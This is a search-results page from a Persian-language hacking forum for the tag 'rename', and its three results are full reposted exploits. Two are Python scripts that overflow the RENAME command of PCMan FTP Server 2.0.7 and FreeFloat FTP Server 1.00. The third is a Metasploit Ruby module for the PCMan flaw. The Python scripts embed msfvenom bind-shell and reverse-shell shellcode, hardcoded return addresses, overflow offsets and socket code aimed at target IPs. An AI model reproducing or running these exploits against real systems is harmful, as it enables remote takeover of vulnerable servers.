امکانات انجمن
 • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های ''rename''.تنظیمات بیشتر جستجو

 • جستجو بر اساس برچسب

  برچسب ها را با , از یکدیگر جدا نمایید.
 • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

 • انجمن های اصلی تیم
  • قوانین و اساسنامه ی انجمن
  • آخرین خبرها
  • اطلاعیه ها
  • مدیران
  • دوره های آموزشی
  • انتقادات پیشنهادات
 • آموزش های تخصصی
  • برنامه نویسی
  • هکینگ
  • امنیت
  • شبکه
  • سخت افزار
  • متفرقه
 • پرسش و پاسخ (FAQ)
  • سوالات و مشکلات پیرامون برنامه نویسی
  • سوالات و مشکلات پیرامون هکینگ
  • سوالات و مشکلات پیرامون امنیت
  • سوالات و مشکلات پیرامون شبکه
  • سوالات و مشکلات پیرامون سخت افزار
  • سوالات و مشکلات پیرامون سیستم عامل
  • سوالات و درخواست های متفرقه
 • سیستم عامل
  • ویندوز
  • لینوکس
  • کالی لینوکس
  • اندروید
  • اپل
 • بخش ویژه (مخصوص اعضای ویژه)
  • هکینگ
  • امنیت
  • شبکه
  • متفرقه
 • پروژه های تیم
  • پروژه های نفوذ به سایت
  • پروژه های ساخت نرم افزار
  • پروژه های آسیب پذیری
  • پروژه های ساخت سایت
 • مسابقات
  • مسابقات امنیت و هکینگ
  • مسابقات برنامه نویسی
  • مسابقات کرکینگ
 • عمومی
  • توسعه دهندگان
  • ترفند های متفرقه
  • گرافیک
  • ربات تلگرام
 • بحث آزاد علمی
  • عمران و معماری
  • الکتروتکنیک
  • کتابخانه سراسری
 • بخش دریافت
  • دانلود نرم افزار
 • آرشیو
  • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

 • شروع

  پایان


آخرین به روز رسانی

 • شروع

  پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

 • شروع

  پایان


گروه


درباره من


جنسیت


محل سکونت

3 نتیجه پیدا شد

 1. #!/usr/bin/python # Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow # Date: 29 Aug 2015 # Exploit Author: Koby # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 # Tested on: Windows XP SP3 import socket import sys # msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby # Payload size: 352 bytes shellcode = ( "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" "\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17" "\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f" "\x59\x45\xa7\x18\xa0\x3f\xbc\x24\x98\x31\x82\x6c\x7e\x2b" "\xd2\xef\xd0\x3b\x93\x52\x1d\x1a\xb2\x54\x30\xe5\xe1\xc4" "\x59\x45\xa3\x18\x98\x2b\x38\xdf\xc3\x6f\x50\xdb\xd3\xc6" "\xe2\x18\x8b\x37\xb2\x40\x59\x5e\xab\x70\xe8\x5e\x38\xa7" "\x59\x16\x65\xa2\x2d\xbb\x72\x5c\xdf\x16\x74\xab\x32\x62" "\x45\x90\xaf\xef\x88\xee\xf6\x62\x57\xcb\x59\x4f\x97\x92" "\x01\x71\x38\x9f\x99\x9c\xeb\x8f\xd3\xc4\x38\x97\x59\x16" "\x63\x1a\x96\x33\x97\xc8\x89\x76\xea\xc9\x83\xe8\x53\xcc" "\x8d\x4d\x38\x81\x39\x9a\xee\xfb\xe1\x25\xb3\x93\xba\x60" "\xc0\xa1\x8d\x43\xdb\xdf\xa5\x31\xb4\x6c\x07\xaf\x23\x92" "\xd2\x17\x9a\x57\x86\x47\xdb\xba\x52\x7c\xb3\x6c\x07\x7d" "\xbb\xca\x82\xf5\x4e\xd3\x82\x57\xe3\xfb\x38\x18\x6c\x73" "\x2d\xc2\x24\xfb\xd0\x17\xa2\xcf\x5b\xf1\xd9\x83\x84\x40" "\xdb\x51\x09\x20\xd4\x6c\x07\x40\xdb\x24\x3b\x2f\x4c\x6c" "\x07\x40\xdb\xe7\x3e\x2c\x52\x6c\x07\x40\x24\xfb\xa7\x79" "\xfe\xf2\x2d\xc2\xdb\xf0\xbf\x73\xb3\x1a\x31\x40\xe4\xc4" "\xe3\xe1\xd9\x81\x8b\x41\x51\x6e\xb4\xd0\xf7\xb7\xee\x16" "\xb2\x1e\x96\x33\xa3\x55\xd2\x53\xe7\xc3\x84\x41\xe5\xd5" "\x84\x59\xe5\xc5\x81\x41\xdb\xea\x1e\x28\x35\x6c\x07\x9e" "\x53\xdd\x84\x51\x4c\xa3\xba\x1f\x34\x8e\xb2\xe8\x66\x28" "\x22\xa2\x11\xc5\xba\xb1\x26\x2e\x4f\xe8\x66\xaf\xd4\x6b" "\xb9\x13\x29\xf7\xc6\x96\x69\x50\xa0\xe1\xbd\x7d\xb3\xc0" "\x2d\xc2") # buffer overflow was found by fuzzing with ftp_pre_post (metasploit) # bad data is a string of 2004 "A" characters to get to a EIP overwrite # followed by the JMP ESP instruction 0x7cb48eed in SYSTEM32.dll baddata = '\x41'*2004+'\xed\x8e\xb4\x7c' # login to ftp followed by sending the bad data & payload s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.135',21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('RENAME ' + baddata +'\x90'*50+ shellcode+ '\r\n') s.close()
 2. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ## Original Exploit Information ## # Date: 29 Aug 2015 # Exploit Author: Koby # Tested on: Windows XP SP3 # Link: https://www.exploit-db.com/exploits/38013/ ## Software Information ## # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0.7 ## Metasploit Module Information ## # Date: 16 April 2016 # Exploit Author: Jonathan Smith # Tested on: Windows XP SP2 require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'PCMan RENAME overflow', 'Description' => 'This module exploits a buffer overflow in the RENAME command of PCMAN FTP Server 2.0.7. This requires authentication but anonymous credentials are enabled by default.', 'Author' => [ 'Metasploit module author: Jonathan Smith. Vulnerability originally discovered by Koby on 29 August 2015. Metasploit module developed 16 April 2016.'], 'Version' => '$Revision: 1 $', 'Platform' => ['win'], 'Targets' => [ [ 'Windows XP SP2', { } ],], 'DefaultTarget' => 0, 'License' => GPL_LICENSE, 'Payload' => {'BadChars' => "\x00\x0a\x0d"}, 'DefaultOptions' => {'EXITFUNC' => 'process'} )) end def exploit connect_login exploitcode = "A" * 2004 + "\x65\x82\xA5\x7C" + make_nops(30) + payload.encoded send_cmd( ['RENAME', exploitcode] , false ) disconnect end end
 3. Moeein Seven

  Hacking

  #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit # Date: 29/10/2016 # Exploit Author: Eagleblack # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 Spanish version x86 # CVE : N/A #Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a # long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry # he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain # a remote code execution on the system that is running the FTP Server, in this case Windows XP. import socket ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer #Metasploit shellcode: #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c" "\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c" "\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81" "\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d" "\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c" "\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1" "\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40" "\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66" "\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72" "\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec" "\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b" "\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c" "\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c" "\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f" "\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01" "\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03" "\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff" "\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e" "\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e" "\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8" "\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f" "\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6" "\x33\x93\xbd\x45\x33\xb6") buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245 print "Sending Buffer" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target s.recv(1024) #FTPBanner s.send('USER \r\n') #Sending USER (Null user) s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('RENAME' + buffer +'\r\n') s.close()